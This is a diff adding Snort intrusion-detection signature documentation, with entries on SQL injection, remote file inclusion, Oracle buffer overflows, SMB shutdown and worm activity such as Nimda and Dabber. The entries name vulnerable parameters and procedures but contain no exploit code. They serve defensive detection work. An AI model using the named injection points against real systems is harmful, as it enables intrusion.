+--
+
--- /dev/null
+++ b/doc/signatures/100000449.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000449
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "OfficeFlow" application running on a webserver. Access to 
+the file "files.asp" with SQL commands being passed as the "Project" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Project" parameter in the "files.asp" script used by 
+the "OfficeFlow" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using OfficeFlow
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000618.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000618
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_validate.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2658.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2658
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1832.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1832
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown 
+external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow 
+users to transfer files directly between hosts. This can allow malicious
+users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain
+unauthorized access to a host. This events indicates that an attempt has
+been made to add a user to the contact list of Mirabilis' ICQ client via
+a specially crafted URI on a website.
+
+Certain versions of Mirabilis' ICQ client do not require user 
+intervention before adding another ICQ user to the contact list. It is 
+possible for a client to be added to the contact list via a specially 
+crafted URI without the user's knowledge.
+
+--
+Attack Scenarios:
+An attacker might utilize this vulnerability in the ICQ client to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2499.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2499
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1095.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1095
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2848.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2848
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_master_repobject
+. This procedure is included in
+sys.dbms_repcat_utl4.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2482.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2446.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2446
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1648.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1648
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2945.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2945
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1770.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1770
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1233.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1233
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2660.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2660
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2691.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2691
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure parallel_push_recovery
+. This procedure is included in
+sys.dbms_defer_internal_sys.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1254.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1254
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/438.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+438
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect with an undefined ICMP code.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+ICMP datagrams with undefined codes should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
--- /dev/null
+++ b/doc/signatures/1826.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1826
+
+--
+Summary:
+This event is generated when an attempt is made to access the WEB-INF
+directory on a web server.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the WEB-INF
+directory on a web server.
+
+Multiple vendors are affected by an information disclosure issue where
+sensitive contents of a web application server can be revealed to an
+attacker by requesting the contents of this directory.
+
+--
+Affected Systems:
+	Multiple vendors, see references.
+
+--
+Attack Scenarios:
+The attacker can make a simple web request for the directory that will
+reveal the sensitive files. The attacker can then retrieve the files for
+information that can be used in later attacks against the server or
+application.
+
+--
+Ease of Attack:
+Simple. Exploit software not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000111.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000111
+
+-- 
+Summary: 
+This event is generated when the Dabber virus attempts to exploit a 
+vulnerability in the FTP server installed by the Sasser virus.
+
+-- 
+
+Impact: 
+If the Sasser virus is currently running on the affected system, then the 
+Dabber virus will be able to install itself as well.
+
+--
+Detailed Information:
+Some variants of the Sasser virus install an FTP server that listens on port 
+1023. However, this FTP server suffers from a buffer overflow in the PORT 
+command, which can be exploited with a command of 100 or more characters. The 
+Dabber virus makes use of this vulnerability as an infection vetor.
+
+--
+Affected Systems:
+Any machine with a variant of the Sasser virus whose FTP server listens on port 
+1023. 
+
+--
+
+Attack Scenarios: 
+A known virus scans the Internet in search of vulnerable systems.
+
+-- 
+
+Ease of Attack: 
+Simple, as the virus is in the wild.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Users should employ a virus removal tool to clean their system of both Dabber 
+and Sasser, and then apply the latest security patches from Microsoft to 
+prevent further infections.
+
+--
+Contributors: 
+Matt Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1481.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1481
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1290.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1290
+
+--
+Summary:
+This event is generated when an attempt is made to load and run
+readme.eml, which is used as an infection vector for the nimda worm.
+
+--
+Impact:
+The source address is likely infected with the Nimda worm. The
+destination, without adequate AntiVirus protection and the proper
+patches, may now be infected and may attempt to infect other hosts using
+this or any of the other infection vectors that the Nimda worm uses.
+
+--
+Detailed Information:
+The nimda worm affects Microsoft Windows systems and attempts to spread
+via email, network shares and Microsoft IIS servers. A compromised
+server will attempt to spread and infect other vulnerable hosts.
+
+--
+Affected Systems:
+	Microsoft Windows 95, 98, ME, NT and 2000 
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Simple. Nimda is a worm, so the attack is automated. Exposure of unprotected
+systems to the internet has been know to result in an infection within
+15 minutes.
+
+--
+False Positives:
+None Known
+Web pages containing the Javascript as text in a web page may activate
+this alert. Web-sites detailing Nimda infection vectors may also trigger this event.
+
+--
+False Negatives:
+Nimda has multiple infection vectors. This rule alone will only detect
+a particular type.
+
+--
+Corrective Action:
+Ensure all servers within your domain are protected to the appropriate
+patch-levels to mitigate infection and spread of the Nimda worm.
+
+Ensure network clients in your domain are also appropriately patched and are
+running up to date AntiVirus software.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Giles Coochey	and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+
+Cisco:
+http://www.cisco.com/warp/public/cc/so/cuso/epso/sqfr/snam_wp.htm
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/Nimda.asp
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/NimdaIE6.asp
+
+SecurityFocus
+http://online.securityfocus.com/archive/75/215118
+
+--
--- /dev/null
+++ b/doc/signatures/3244.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3244
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
